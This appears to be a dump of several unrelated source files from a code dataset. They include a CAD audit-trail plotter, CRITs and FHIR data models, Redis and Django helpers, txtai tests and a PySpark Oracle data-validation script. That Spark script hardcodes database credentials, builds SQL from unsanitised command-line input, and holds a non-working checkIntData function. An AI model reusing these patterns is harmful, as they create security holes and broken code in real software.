with open(databaseFileName, 'r') as csv_file:
data_reader = csv.reader(csv_file)
for row in data_reader:
database.append(row)
# parentDirectory = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
# outFilePath = os.path.join(parentDirectory, "Participant_audit_trails", databaseFileName)
# print("Output file path: ", outFilePath)
rowEntry = [fileName,
totalTime,
partstudioTime,
partstudioTimeAccountedFor,
unaccountedTime,
readDrawingTime,
sketchCreateTime,
featureCreateTime,
sketchEditTime,
featureEditTime,
cancelledCreateTime,
cancelledEditTime,
# unaccounted ratio is a floating point number, want to show it as % in database
round(unaccountedRatio,4)*100,
"Counters ->",
sketchesCreated,
featuresCreated,
operationsCancelled,
sketchesEdited,
featuresEdited,
switchedToDrawing,
movedFeature,
movedRollbackBar,
undoRedo,
createFolder,
renameFeature,
showHide,
deletedFeature
]
# write over existing entry if a row with the same filename already exists
newEntryFlag = True
# iterate through database's first column, if there's an existing entry with the same file name, set flag to False
for index, row in enumerate(database):
#print("Index = " + str(index))
#print("Checking row" + str(index) + " with entry: "+ row[0])
if row[0] == fileName:
database[index] = rowEntry
#print("found, index:" + str(index))
newEntryFlag = False
# otherwise add new row to the end
if newEntryFlag is True:
database.append(rowEntry)
#print("adding new entry to database: \n" + str(rowEntry))
with open(databaseFileName, "w", newline="") as out_file:
writer = csv.writer(out_file)
for row in database:
writer.writerow(row)
##############################################
############## Printing outputs ##############
"""
print("\n### Timers ###")
totalTime = timeConverter(totalTime)
print("Total time spent: " + totalTime[0] + " minutes," + totalTime[1] + " seconds")
readDrawingTime = timeConverter(readDrawingTime)
print("Total readDrawingTime: " + readDrawingTime[0] + " minutes," + readDrawingTime[1] + " seconds")
partstudioTime = timeConverter(partstudioTime)
print("Total partstudioTime (based on Onshape tabs): " + partstudioTime[0] + " minutes," + partstudioTime[1] + " seconds")
#print("Total partstudioTime (raw): " + str(partstudioTime))
partstudioTimeAccountedFor = timeConverter(partstudioTimeAccountedFor)
print("Of which "+ partstudioTimeAccountedFor[0] + " minutes, " + partstudioTimeAccountedFor[1] + " seconds "
"are accounted for with one of the following individual time trackers:")
print("Time unaccounted for (panning, zooming, UI surfing, \nsitting in PS thinking, organizing feature tree, renaming feautres): {:.2%}".format(unaccountedRatio))
print("")
sketchCreateTime = timeConverter(sketchCreateTime)
print("Total sketchCreateTime: " + sketchCreateTime[0] + " minutes," + sketchCreateTime[1] + " seconds")
featureCreateTime = timeConverter(featureCreateTime)
print("Total featureCreateTime: " + featureCreateTime[0] + " minutes," + featureCreateTime[1] + " seconds")
sketchEditTime = timeConverter(sketchEditTime)
print("Total sketchEditTime: " + sketchEditTime[0] + " minutes," + sketchEditTime[1] + " seconds")
featureEditTime = timeConverter(featureEditTime)
print("Total featureEditTime: " + featureEditTime[0] + " minutes," + featureEditTime[1] + " seconds")
cancelledCreateTime = timeConverter(cancelledCreateTime)
print("Total cancelledCreateTime: " + cancelledCreateTime[0] + " minutes," + cancelledCreateTime[1] + " seconds")
cancelledEditTime = timeConverter(cancelledEditTime)
print("Total cancelledEditTime: " + cancelledEditTime[0] + " minutes," + cancelledEditTime[1] + " seconds")
print("\n### Counters ###")
print("sketchesCreated: " + str(sketchesCreated))
print("featuresCreated: " + str(featuresCreated))
print("operationsCancelled: " + str(operationsCancelled))
print("sketchesEdited: " + str(sketchesEdited))
print("featuresEdited: " + str(featuresEdited))
print("switchedToDrawing: " + str(switchedToDrawing))
print("movedFeature: " + str(movedFeature))
print("movedRollbackBar: " + str(movedRollbackBar))
print("undoRedo: " + str(undoRedo))
print("createFolder: " + str(createFolder))
print("renameFeature: " + str(renameFeature))
print("showHide: " + str(showHide))
print("deletedFeature: " + str(deletedFeature))
"""
#print("\nsketch names: ")
#print(*sketchesCreatedNames, sep="\n")
#print(time_series)
# Plotting the time series event plot
#position = [[],[],[],[],[],[],[],[],[],[],[],[],[],[]] # x coordinates, a list of 14 lists
position = [[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]] # x coordinates, a list of 18 lists
# (added 3 extra for plotting different drawings in different colours
for (action, timestamp, duration) in time_series:
if "readDrawingTime - Changes" in action:
for i in range(duration.seconds):
position[17].append((timestamp - startTime).seconds + i)
elif "readDrawingTime - Step 4" in action:
for i in range(duration.seconds):
position[16].append((timestamp - startTime).seconds + i)
elif "readDrawingTime - Step 3" in action:
for i in range(duration.seconds):
position[15].append((timestamp - startTime).seconds + i)
elif "readDrawingTime - Step 2" in action:
for i in range(duration.seconds):
position[14].append((timestamp - startTime).seconds + i)
elif "readDrawingTime - Step 1" in action:
for i in range(duration.seconds):
position[13].append((timestamp - startTime).seconds + i)
elif "sketchCreateTime" in action:
for i in range(duration.seconds):
position[12].append((timestamp - startTime).seconds + i)
elif "featureCreateTime" in action:
for i in range(duration.seconds):
position[11].append((timestamp - startTime).seconds + i)
elif "sketchEditTime" in action:
for i in range(duration.seconds):
position[10].append((timestamp - startTime).seconds + i)
elif "featureEditTime" in action:
for i in range(duration.seconds):
position[9].append((timestamp - startTime).seconds + i)
elif action == "cancelledCreateTime":
for i in range(duration.seconds):
position[8].append((timestamp - startTime).seconds + i)
elif action == "cancelledEditTime":
for i in range(duration.seconds):
position[7].append((timestamp - startTime).seconds + i)
elif action == "moveRollbackBar":
for i in range(duration.seconds):
position[6].append((timestamp - startTime).seconds + i)
elif action == "moveFeature":
for i in range(duration.seconds):
position[5].append((timestamp - startTime).seconds + i)
elif action == "renameFeature":
for i in range(duration.seconds):
position[4].append((timestamp - startTime).seconds + i)
elif action == "undoRedo":
for i in range(duration.seconds):
position[3].append((timestamp - startTime).seconds + i)
elif action == "deletedFeature":
for i in range(duration.seconds):
position[2].append((timestamp - startTime).seconds + i)
elif action == "showHide":
for i in range(duration.seconds):
position[1].append((timestamp - startTime).seconds + i)
elif action == "createFolder":
for i in range(duration.seconds):
position[0].append((timestamp - startTime).seconds + i)
offset = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 13, 13, 13, 13] # y coordinates, last 4 are for drawings so superimposing them
linelengths1 = 7 * [0.5] + 6 * [0.9] + 5*[0.9] #last 5 controls height of readDrawing bars
colors1 = 7*["orangered"] + 6*["mediumblue"] + ["red"] + ["gold"] + ["lime"] + ["purple"]+ ["blue"]
#Drawing: #1 #2 #3 #4 #changes
plt.rcParams["figure.figsize"] = (10, 5) # Resize the plot
# task2 plots are much shorter in duration, so resize the overall plot to be narrower
if "Task2" in fileName:
plt.rcParams["figure.figsize"] = (8, 5) # Resize the plot
plt.eventplot(position, lineoffsets=offset,linelengths=linelengths1, linewidths= 1, colors=colors1)
y = ["Created folder", "Show/hide", "Deleted feature", "Undo/Redo", "Rename feature", "Move feature",
"Move rollback bar", "Cancelled edit", "Cancelled creation", "Edit PS feature", "Edit sketch",
"Create PS feature", "Create sketch feature", "Read drawing"]
plt.yticks(np.arange(len(y)), y)
plt.xlabel("Time (s)")
# removing "_cleaned" from the plot title
fileName = fileName.removesuffix("_cleaned")
#print(fileName)
# add filename as title
plt.title(fileName, fontdict=None, loc='center', pad=6)
plt.tight_layout()
saveFigLocation = os.path.join(os.getcwd(), "Analysis_output", fileName + "_cleaned")
plt.savefig(saveFigLocation) #, bbox_inches='tight'
#plt.show()
plt.close()
return None
###############################################################################
#fileName = input("Enter file name (with .csv): ")
#fileName = "BT_ID01_Task1.csv"
#read_file(fileName)
# need to run this on the cleaned file
#fileName = fileName+"_cleaned.csv"
#analyzeAuditTrail(fileName)
#"""
for root,dirs,files in os.walk("Participant_audit_trails"):
for name in files:
#print(os.path.join(root, name))
if "cleaned" not in name:
print("\n########################################################")
print("Opening and analyzing: " + name)
read_file(name)
#"""
"""
# for analyzing one specific file
name = "ID01_BT_Task2.csv"
#name = str(os.getcwd()) + "/Participant_audit_trails/" + name
print(name)
read_file(name)
"""
|
the-stack_0_6142 | import logging
from mongoengine import Document
from mongoengine import StringField, IntField
from django.conf import settings
from crits.core.crits_mongoengine import CritsDocument, CritsSchemaDocument
logger = logging.getLogger(__name__)
class Sector(CritsDocument, CritsSchemaDocument, Document):
"""
CRITs Sector Class
"""
meta = {
"collection": settings.COL_SECTOR_LISTS,
"crits_type": 'Sectorlist',
"latest_schema_version": 1,
"schema_doc": {
'name': 'Sectorlist name',
'Campaign': 'Integer',
'Certificate': 'Integer',
'Domain': 'Integer',
'Email': 'Integer',
'Target': 'Integer',
'Event': 'Integer',
'IP': 'Integer',
'Indicator': 'Integer',
'PCAP': 'Integer',
'RawData': 'Integer',
'Sample': 'Integer'
},
}
name = StringField(required=True)
Campaign = IntField(default=0)
Certificate = IntField(default=0)
Domain = IntField(default=0)
Email = IntField(default=0)
Event = IntField(default=0)
Indicator = IntField(default=0)
IP = IntField(default=0)
PCAP = IntField(default=0)
RawData = IntField(default=0)
Sample = IntField(default=0)
Target = IntField(default=0)
def migrate(self):
"""
Migrate to the latest schema version.
"""
pass
class SectorObject(CritsDocument, CritsSchemaDocument, Document):
"""
Sector object class.
"""
meta = {
"crits_type": "SectorObject",
"collection": settings.COL_SECTORS,
"latest_schema_version": 1,
"schema_doc": {
'name': 'The name of the sector',
'active': 'Enabled in the UI (on/off)',
}
}
name = StringField()
active = StringField(default="on")
|
the-stack_0_6143 | """
:mod:`redis_helpers` Helper Classes and Functions for managing BIBFrAME
Organization Authorities in the Redis Library Services Platform
"""
__author__ = "Jeremy Nelson"
import re
from bibframe.models import Organization
from person_authority.redis_helpers import process_name
from aristotle.settings import REDIS_DATASTORE
PUNCTUATION_RE = re.compile(r"[^!-~]|[.,;:]")
def add_organization(name_metaphone_keys,
org_attributes,
redis_datastore=REDIS_DATASTORE):
"""Function adds a BIBFRAME Organization to RLSP
Function takes a Redis authority instance, the organization's name metaphone
keys and the organization's attributes to create a BIBFRAME organization
entity in the RLSP.
Parameters:
redis_datastore -- Redis Instance or Redis Cluster
org_attributes -- Dict of organization's properties
"""
new_organization = Organization(redis_datastore=redis_datastore)
for key, value in org_attributes.iteritems():
setattr(new_organization, key, value)
new_organization.save()
for metaphone in name_metaphone_keys:
redis_datastore.sadd(metaphone, new_organization.redis_key)
return new_organization
def get_or_add_organization(org_attributes,
redis_datastore=REDIS_DATASTORE):
"""
Function takes a dict of an organization's attributes and either returns an existing
Organization or creates a new organization based on similarity metric.
:param org_attributes:
:param redis_datastore: Redis BIBFRAME Authority instance
"""
name_metaphones, name_metaphone_keys, org_keys = [], [], []
normed_location_key, place_keys = None, []
if 'label' in org_attributes:
raw_name = org_attributes.get('label')
name_metaphones = process_name(raw_name)
name_metaphone_keys = ["organization-metaphone:{0}".format(x) for x in name_metaphones]
existing_org_keys = redis_datastore.sinter(name_metaphone_keys)
if len(existing_org_keys) == 0:
return add_organization(name_metaphone_keys,
org_attributes,
redis_datastore=redis_datastore)
else:
return Organization(redis_key=list(existing_org_keys)[0],
redis_datastore=redis_datastore)
|
the-stack_0_6144 | # -*- coding: UTF-8 -*-
# vim: set expandtab sw=4 ts=4 sts=4:
#
# phpMyAdmin web site
#
# Copyright (C) 2008 - 2016 Michal Cihar <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from django.core.management.base import BaseCommand
from django.conf import settings
from dateutil import parser
import json
import os
from glob import glob
from files.models import Release, Download
from bs4 import BeautifulSoup
from files.utils import read_sum
import codecs
from pmaweb.cdn import purge_files_cdn
def glob_downloads(prefix=''):
return (
glob(prefix + '*.zip') +
glob(prefix + '*.7z') +
glob(prefix + '*.tar.gz') +
glob(prefix + '*.tar.bz2') +
glob(prefix + '*.tar.xz')
)
class Command(BaseCommand):
help = 'Imports files from filesystem'
def process_files(self, path, release, prefix='', force=False):
os.chdir(path)
for filename in glob_downloads(prefix):
download, created = Download.objects.get_or_create(
release=release, filename=filename
)
if not created and not force:
continue
download.release = release
download.size = os.path.getsize(filename)
download.sha1 = read_sum('{0}.sha1'.format(filename))
download.sha256 = read_sum('{0}.sha256'.format(filename))
download.signed = os.path.exists('{0}.asc'.format(filename))
download.save()
def process_releases(self, path):
for version in os.listdir(path):
if version in ('README.rst', 'index.html'):
continue
release, created = Release.objects.get_or_create(version=version)
if created:
self.stdout.write('Added {0}'.format(version))
notes = '{0}/{1}/phpMyAdmin-{1}-notes.html'.format(
path, version
)
if os.path.exists(notes):
with codecs.open(notes, 'r', 'utf-8') as handle:
release.release_notes_markup_type = 'html'
release.release_notes = u'<pre>{0}</pre>'.format(
BeautifulSoup(
handle.read(),
'lxml',
).get_text()
)
release.save()
self.process_files(
os.path.join(path, version),
release
)
def process_snapshots(self, path):
os.chdir(path)
# List current versions
versions = set([x.rsplit('.', 1)[0].split('-')[1] for x in glob('*+snapshot.json')])
# Delete no longer present snapshots
Release.objects.filter(snapshot=True).exclude(version__in=versions).delete()
purge = []
# Process versions
for version in versions:
metafile = os.path.join(
path,
'phpMyAdmin-' + version + '.json'
)
with open(metafile, 'r') as handle:
metadata = json.load(handle)
defaults = {
'snapshot': True,
'release_notes': metadata['commit'],
'release_notes_markup_type': 'plain',
'date': parser.parse(metadata['date']),
}
release, created = Release.objects.get_or_create(
version=version,
defaults=defaults,
)
if created:
self.stdout.write('Added {0}'.format(version))
else:
modified = False
for item in defaults:
if item == 'release_notes':
current = release.release_notes.raw
else:
current = getattr(release, item)
if current != defaults[item]:
setattr(release, item, defaults[item])
modified = True
if modified:
self.stdout.write('Updated {0}'.format(version))
release.save()
self.process_files(
path,
release,
prefix='phpMyAdmin-' + version,
force=True,
)
if modified:
for download in release.download_set.all():
filename = download.__unicode__()
purge.extend([
filename,
'{}.sha1'.format(filename),
'{}.sha256'.format(filename),
])
if purge:
purge_files_cdn(*purge)
def handle(self, *args, **options):
self.process_releases(os.path.join(settings.FILES_PATH, 'phpMyAdmin'))
self.process_snapshots(os.path.join(settings.FILES_PATH, 'snapshots'))
|
the-stack_0_6146 |
"""
;==========================================
; Title: Data Validation with Apache Spark and Python
; Author: Harshal Vasant Dhake
; Date: 15-Aug-2019
;==========================================
"""
from __future__ import print_function
import generateSql
import math
import sys
from pyspark.sql import SparkSession, Row
from pyspark.sql.types import *
from pyspark.sql.functions import regexp_replace, col, udf, when, lit, concat, length
from pyspark import SparkContext
def build_schema(tableName):
"""Build and return a schema to use for the sample data."""
statement = "(select column_name, case when data_type='VARCHAR2' then 'String' when data_type='CHAR' then 'String' when data_type='DATE' then 'String' when data_type='NVARCHAR2' then 'String' when data_type='NUMBER' then 'String' else 'String' end AS data_type, nullable from dba_tab_columns where table_name ='" + tableName + "' order by column_id asc )"
buildSchemaList = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
xList = buildSchemaList.collect()
type_map = {'String': StringType(), 'Integer': IntegerType(), 'Date': DateType()}
type_null_map = {'Y': True, 'N': False}
cols = [StructField(x.COLUMN_NAME, type_map.get(x.DATA_TYPE, StringType()), type_null_map.get(x.NULLABLE,True)) for x in xList]
schema = StructType(cols)
return schema
def build_val_col_list(tableName):
"""Build and return a schema to use for the sample data."""
statement = "( SELECT column_name, data_type, case when data_type='NUMBER' THEN NVL(DATA_PRECISION,38) + DATA_SCALE ELSE DATA_LENGTH END AS ORACLE_LENGTH FROM dba_tab_columns WHERE table_name = '" + tableName + "' order by column_id asc )"
buildColTypeList = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
xList = buildColTypeList.collect()
return xList
def build_column_type_list(tableName):
"""Build and return a schema to use for the sample data."""
statement = "(select column_name, case when data_type='VARCHAR2' then 'string' when data_type='CHAR' then 'string' when data_type='DATE' then 'date' when data_type='NVARCHAR2' then 'string' when data_type='NUMBER' and data_scale = 0 then 'long' when data_type='NUMBER' and data_scale > 0 then 'decimal('|| data_precision ||','||data_scale ||')' else 'String' end AS data_type from dba_tab_columns where table_name ='" + tableName + "' order by column_id asc )"
buildColTypeList = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
xList = buildColTypeList.collect()
print(xList)
return xList
def build_nullable_list(tableName):
statement = "(select column_name from all_tab_columns where nullable = 'N' and table_name= '" + tableName + "' order by column_id asc)t"
nullColList = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
stringsDS = nullColList.rdd.map(lambda row: "%s" % (row.COLUMN_NAME))
return stringsDS
def checkIntData(columnData):
status = "GOOD"
try:
columnData.toInt
except ValueError as ve:
if columnData == null:
print('Do nothing')
elif columnData.length == 0:
status = "ERROR"
else:
status = "BAD"
return status
def build_pk_list():
"""Build and return a schema to use for the sample data."""
statement = "(select a.column_name FROM all_cons_columns a JOIN all_constraints c ON (a.owner = c.owner AND a.constraint_name = c.constraint_name) WHERE c.constraint_type='P' and a.table_name= '" + tableName + "' order by a.position asc ) "
PK = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
stringsDS = PK.rdd.map(lambda row: "%s" % (row.COLUMN_NAME))
countList = 0
for x in stringsDS.collect():
if countList == 0:
columnList = x
countList = countList + 1
else:
columnList = columnList + ',' + x
countList = countList +1
return columnList
def build_uniq_idx_list(tableName):
"""Build and return a schema to use for the sample data."""
statement = "(select a.index_name, listagg (a.column_name, ',') WITHIN GROUP (ORDER BY a.column_position) COLUMN_NAMES FROM dba_ind_columns a, dba_indexes b WHERE a.table_name= '" + tableName + "' AND a.table_name = b.table_name AND a.index_name= b.index_name AND b.uniqueness = 'UNIQUE' AND b.status = 'VALID' group by a.index_name)t"
uindexes = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", statement) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
return uindexes
def check_tbl_exist(spark, tableName):
query = "(select * from DBA_TABLES WHERE TABLE_NAME ='" + tableName + "')t"
#Read data from Oracle Table
tblCount = spark.read.format("jdbc") \
.option("url","jdbc:oracle:thin:system/oracle@//0.0.0.0:1521/xe") \
.option("dbtable", query) \
.option("user","system") \
.option("password","oracle") \
.option("driver","oracle.jdbc.driver.OracleDriver") \
.load()
returnCount = tblCount.count()
if returnCount == 1:
print('Table '+ tableName + ' exist in Database')
else:
print('Table Name '+ tableName + ' does not exist in database . Kindly check')
exit()
def oracle_data_validation(spark, tableName,fileName):
# $example on:programmatic_schema$
sc = spark.sparkContext
lines = spark.read.option("header", "true") \
.option("delimiter", ",") \
.option("inferSchema", "true") \
.csv(fileName)
lines = sc.textFile(fileName)
parts = lines.map(lambda l: l.split(","))
fileParts = parts.map(lambda p: (p[0], p[1], p[2], p[3], p[4], p[5], p[6], p[7]))
schemaDF = spark.createDataFrame(fileParts, schema=build_schema(tableName))
colTypeList = build_column_type_list(tableName)
schemaDF.printSchema()
#schemaDF = schemaDF.collect()
#schemaDF.show()
colValidationTypeList = build_val_col_list(tableName)
for i in colValidationTypeList:
if (i.DATA_TYPE == 'VARCHAR2') or (i.DATA_TYPE == 'CHAR') or (i.DATA_TYPE == 'NVARCHAR2'):
schemaDF = schemaDF.withColumn(str("STRCHK_")+i.COLUMN_NAME, when(length(col(i.COLUMN_NAME)) > i.ORACLE_LENGTH,lit("String is greater than defined size")).otherwise(lit("None")))
else:
schemaDF = schemaDF.withColumn(str("CHK_")+i.COLUMN_NAME,
when(col(i.COLUMN_NAME).cast("long").isNull() & col(i.COLUMN_NAME).cast("long").isNotNull(),lit("Not a valid Number"))
.when(length(col(i.COLUMN_NAME)) > i.ORACLE_LENGTH ,lit("Column length Mismatch "))
.otherwise(lit("None")))
for i in colTypeList:
if i.DATA_TYPE != 'string' and i.DATA_TYPE != 'date':
schemaDF = schemaDF.withColumn(i.COLUMN_NAME, col(i.COLUMN_NAME).cast(i.DATA_TYPE))
schemaDF.printSchema()
schemaDF.createOrReplaceTempView(tableName)
column_list = build_nullable_list(tableName)
print(schemaDF)
emptyTblSchema = StructType(
[
StructField('tableName', StringType(),True),
StructField('columnName', StringType(), True),
StructField('dataType', StringType(), True),
StructField('precision', StringType(), True),
StructField('scale', StringType(), True),
StructField('dataTypeCheck', StringType(), True),
StructField('minValue', IntegerType(), True),
StructField('maxValue', IntegerType(), True),
StructField('unqCheck', StringType(), True),
StructField('dateFormat', StringType(), True),
StructField('primaryKeyCheck', StringType(), True),
StructField('IndexCheck', StringType(), True),
]
)
explorer = spark.createDataFrame(sc.emptyRDD(), emptyTblSchema)
print(explorer.collect())
schemaDF.show()
null_store = []
# Iterate through all the columns and capture null counts for each column
print('============= Checking for NOT NULL Constraints =======================')
rule_type = 'NOT NULL Check'
results={}
for column_names in column_list.collect():
query = "Select count(1) from " + tableName + " where " + column_names + " is NULL OR " + column_names + " = 'NULL' "
df1 = spark.sql(query).collect()
for i in df1:
results.update(i.asDict())
res_in_num=results['count(1)']
result_store=[rule_type,column_names,res_in_num]
if res_in_num > 0:
print (result_store)
pk_column_list = build_pk_list()
pk_store = []
pk_rule_type = 'primary key check'
print('============= Checking for Primary Key =============================')
results={}
query1 = generateSql.get_unique_sql(tableName, pk_column_list,'')
df2 = spark.sql(query1).collect()
for i in df2:
results.update(i.asDict())
pk_in_num=results['COUNT']
pk_store=[pk_rule_type,pk_column_list,pk_in_num]
print (pk_store)
print('============= Checking for Unique index column ===============')
UI = build_uniq_idx_list(tableName)
stringsDS = UI.rdd.map(lambda row: "%s" % (row.COLUMN_NAMES))
unique_idx_rule_type = 'Unique index check'
results3={}
for i in stringsDS.collect():
query3 = generateSql.get_unique_sql(tableName, i,'')
df3 = spark.sql(query3).collect()
for j in df3:
results3.update(j.asDict())
res_in_num=results3['COUNT']
result_store3=[unique_idx_rule_type,i,res_in_num]
print (result_store3)
if __name__ == "__main__":
# $example on:init_session$
spark = SparkSession \
.builder \
.appName("Python Spark SQL data source example") \
.getOrCreate()
#basic_df_example(spark)
#schema_inference_example(spark)
spark.sparkContext.setLogLevel("ERROR")
tableName = sys.argv[1].strip()
print(tableName)
check_tbl_exist(spark, tableName)
fileName = sys.argv[2].strip()
print(fileName)
oracle_data_validation(spark,tableName,fileName)
#jdbc_dataset_example(spark)
spark.stop() |
the-stack_0_6148 | """
Summary module tests
"""
import unittest
from txtai.pipeline import Textractor
# pylint: disable = C0411
from utils import Utils
class TestTextractor(unittest.TestCase):
"""
Textractor tests
"""
def testParagraphs(self):
"""
Tests extraction to paragraphs
"""
textractor = Textractor(paragraphs=True)
# Extract text as sentences
paragraphs = textractor(Utils.PATH + "/article.pdf")
# Check number of paragraphs is as expected
self.assertEqual(len(paragraphs), 13)
def testSentences(self):
"""
Tests extraction to sentences
"""
textractor = Textractor(sentences=True)
# Extract text as sentences
sentences = textractor(Utils.PATH + "/article.pdf")
# Check number of sentences is as expected
self.assertEqual(len(sentences), 17)
def testSingle(self):
"""
Tests a single extraction with no tokenization of the results
"""
textractor = Textractor()
# Extract text as a single block
text = textractor(Utils.PATH + "/article.pdf")
# Check length of text is as expected
self.assertEqual(len(text), 2301)
|
the-stack_0_6153 | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Condition
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
import sys
from . import backboneelement, domainresource
class Condition(domainresource.DomainResource):
""" Detailed information about conditions, problems or diagnoses.
A clinical condition, problem, diagnosis, or other event, situation, issue,
or clinical concept that has risen to a level of concern.
"""
resource_type = "Condition"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.abatementAge = None
""" When in resolution/remission.
Type `Age` (represented as `dict` in JSON). """
self.abatementDateTime = None
""" When in resolution/remission.
Type `FHIRDate` (represented as `str` in JSON). """
self.abatementPeriod = None
""" When in resolution/remission.
Type `Period` (represented as `dict` in JSON). """
self.abatementRange = None
""" When in resolution/remission.
Type `Range` (represented as `dict` in JSON). """
self.abatementString = None
""" When in resolution/remission.
Type `str`. """
self.asserter = None
""" Person who asserts this condition.
Type `FHIRReference` referencing `['Practitioner', 'PractitionerRole', 'Patient', 'RelatedPerson']` (represented as `dict` in JSON). """
self.bodySite = None
""" Anatomical location, if relevant.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.category = None
""" problem-list-item | encounter-diagnosis.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.clinicalStatus = None
""" active | recurrence | relapse | inactive | remission | resolved.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.code = None
""" Identification of the condition, problem or diagnosis.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.encounter = None
""" Encounter created as part of.
Type `FHIRReference` referencing `['Encounter']` (represented as `dict` in JSON). """
self.evidence = None
""" Supporting evidence.
List of `ConditionEvidence` items (represented as `dict` in JSON). """
self.identifier = None
""" External Ids for this condition.
List of `Identifier` items (represented as `dict` in JSON). """
self.note = None
""" Additional information about the Condition.
List of `Annotation` items (represented as `dict` in JSON). """
self.onsetAge = None
""" Estimated or actual date, date-time, or age.
Type `Age` (represented as `dict` in JSON). """
self.onsetDateTime = None
""" Estimated or actual date, date-time, or age.
Type `FHIRDate` (represented as `str` in JSON). """
self.onsetPeriod = None
""" Estimated or actual date, date-time, or age.
Type `Period` (represented as `dict` in JSON). """
self.onsetRange = None
""" Estimated or actual date, date-time, or age.
Type `Range` (represented as `dict` in JSON). """
self.onsetString = None
""" Estimated or actual date, date-time, or age.
Type `str`. """
self.recordedDate = None
""" Date record was first recorded.
Type `FHIRDate` (represented as `str` in JSON). """
self.recorder = None
""" Who recorded the condition.
Type `FHIRReference` referencing `['Practitioner', 'PractitionerRole', 'Patient', 'RelatedPerson']` (represented as `dict` in JSON). """
self.severity = None
""" Subjective severity of condition.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.stage = None
""" Stage/grade, usually assessed formally.
List of `ConditionStage` items (represented as `dict` in JSON). """
self.subject = None
""" Who has the condition?.
Type `FHIRReference` referencing `['Patient', 'Group']` (represented as `dict` in JSON). """
self.verificationStatus = None
""" unconfirmed | provisional | differential | confirmed | refuted |
entered-in-error.
Type `CodeableConcept` (represented as `dict` in JSON). """
super(Condition, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(Condition, self).elementProperties()
js.extend(
[
(
"abatementAge",
"abatementAge",
age.Age,
"Age",
False,
"abatement",
False,
),
(
"abatementDateTime",
"abatementDateTime",
fhirdate.FHIRDate,
"dateTime",
False,
"abatement",
False,
),
(
"abatementPeriod",
"abatementPeriod",
period.Period,
"Period",
False,
"abatement",
False,
),
(
"abatementRange",
"abatementRange",
range.Range,
"Range",
False,
"abatement",
False,
),
(
"abatementString",
"abatementString",
str,
"string",
False,
"abatement",
False,
),
(
"asserter",
"asserter",
fhirreference.FHIRReference,
"Reference",
False,
None,
False,
),
(
"bodySite",
"bodySite",
codeableconcept.CodeableConcept,
"CodeableConcept",
True,
None,
False,
),
(
"category",
"category",
codeableconcept.CodeableConcept,
"CodeableConcept",
True,
None,
False,
),
(
"clinicalStatus",
"clinicalStatus",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
(
"code",
"code",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
(
"encounter",
"encounter",
fhirreference.FHIRReference,
"Reference",
False,
None,
False,
),
(
"evidence",
"evidence",
ConditionEvidence,
"ConditionEvidence",
True,
None,
False,
),
(
"identifier",
"identifier",
identifier.Identifier,
"Identifier",
True,
None,
False,
),
(
"note",
"note",
annotation.Annotation,
"Annotation",
True,
None,
False,
),
("onsetAge", "onsetAge", age.Age, "Age", False, "onset", False),
(
"onsetDateTime",
"onsetDateTime",
fhirdate.FHIRDate,
"dateTime",
False,
"onset",
False,
),
(
"onsetPeriod",
"onsetPeriod",
period.Period,
"Period",
False,
"onset",
False,
),
(
"onsetRange",
"onsetRange",
range.Range,
"Range",
False,
"onset",
False,
),
("onsetString", "onsetString", str, "string", False, "onset", False),
(
"recordedDate",
"recordedDate",
fhirdate.FHIRDate,
"dateTime",
False,
None,
False,
),
(
"recorder",
"recorder",
fhirreference.FHIRReference,
"Reference",
False,
None,
False,
),
(
"severity",
"severity",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
("stage", "stage", ConditionStage, "ConditionStage", True, None, False),
(
"subject",
"subject",
fhirreference.FHIRReference,
"Reference",
False,
None,
True,
),
(
"verificationStatus",
"verificationStatus",
codeableconcept.CodeableConcept,
"CodeableConcept",
False,
None,
False,
),
]
)
return js
